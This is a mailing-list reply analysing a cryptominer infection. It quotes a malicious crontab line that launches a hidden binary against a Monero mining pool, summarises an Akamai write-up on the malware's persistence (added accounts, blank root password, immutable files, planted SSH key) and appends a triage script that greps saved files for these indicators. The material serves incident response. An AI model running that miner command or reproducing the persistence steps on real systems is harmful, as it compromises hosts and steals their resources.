James Knott wrote:
> On 2021-03-02 4:46 p.m., Carlos E.R. wrote:
>> Well, I have removed that crontab line, so it won't be trying to start again.
>
> Ah, you removed a crontab line! You did not tell us that. What line, where exactly?

> 2 * * * * /home/test/.dhpcd -o ca.minexmr.com:4444 -B >/dev/null
                                 ^^^^^^^^^^^^^^^^^^^

That is a useful hint - it led me to this:

https://blogs.akamai.com/sitr/2020/04/a-brief-history-of-a-rootable-docker-i...

  As also expected when this project first started, the docker image was a prime target for crypto-mining malware. An installation script is run via SSH that monitors the process tree with "top" - a process monitoring tool - checking for when the malware has successfully been executed. Once the process is detected, in this case it is "dhcpcd", the malware adds two new users to the system - test and test1. It changes the root password to "" (blank) and creates entries in cron to start the mining software up after a reboot. It also attempts to set the immutable bit (+i) on various files including /etc/shadow and the malware binary in /sbin/dhcpcd. The malware also adds a .ssh key to /root/.ssh/authorized_keys:

  ssh-rsa ..........

  The mining software reports as XMRig v5.2.0.

-- 
Per Jessen, Zürich (5.5°C)
http://www.cloudsuisse.com/ - your owncloud, hosted in Switzerland.
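A host triage check for the indicators that post lists (the cron entry, the added accounts, the blanked root password and the immutable bit), written as an added example; it is not code from the thread or from the Akamai write-up, and the sample inputs below are constructed from the values quoted above.

```sh
#!/bin/sh
# Added triage helper; not code from the thread or the Akamai write-up.
# Each function reads one artefact saved from the suspect host (a file
# argument, or stdin when none is given) and prints the suspicious lines,
# so the checks can be run against copies rather than on the live box.

# Cron entries that launch a hidden file from a home directory, or that
# mention the mining pool underlined in the quoted crontab line.
find_cron() {
    grep -E '/home/[^[:space:]]+/\.[^[:space:]/]+|minexmr\.com' "$@"
}

# The two accounts the write-up says the malware creates (test and test1),
# matched against a copy of /etc/passwd or /etc/shadow.
find_added_accounts() {
    grep -E '^test1?:' "$@"
}

# Accounts with an empty hash in /etc/shadow (field 2): the blank root
# password described above shows up there as "root::...".
find_empty_passwords() {
    awk -F: '$2 == "" { print $1 }' "$@"
}

# Paths carrying the immutable bit, from saved "lsattr -R /etc /sbin" output
# (attribute string first, then the path; a lowercase "i" marks +i).
find_immutable() {
    awk '$1 ~ /i/ { print $2 }' "$@"
}

# Run every check over constructed samples built from the thread's indicators.
demo() {
    printf '%s\n' '0 5 * * * /usr/bin/updatedb' \
        '2 * * * * /home/test/.dhpcd -o ca.minexmr.com:4444 -B >/dev/null' | find_cron
    printf '%s\n' 'root::18689:0:99999:7:::' 'daemon:*:18689:0:99999:7:::' \
        'test:$6$c0nstructed:18689:0:99999:7:::' | find_added_accounts
    printf '%s\n' 'root::18689:0:99999:7:::' 'daemon:*:18689:0:99999:7:::' | find_empty_passwords
    printf '%s\n' '----i---------e------- /etc/shadow' \
        '--------------e------- /etc/passwd' '----i---------e------- /sbin/dhcpcd' | find_immutable
}

demo
```

On a real host, feed the functions saved copies (for example `crontab -l -u test`, the system crontabs under /etc/cron*, /etc/shadow and `lsattr -R` output) and compare what they print against what the administrator expects to be there.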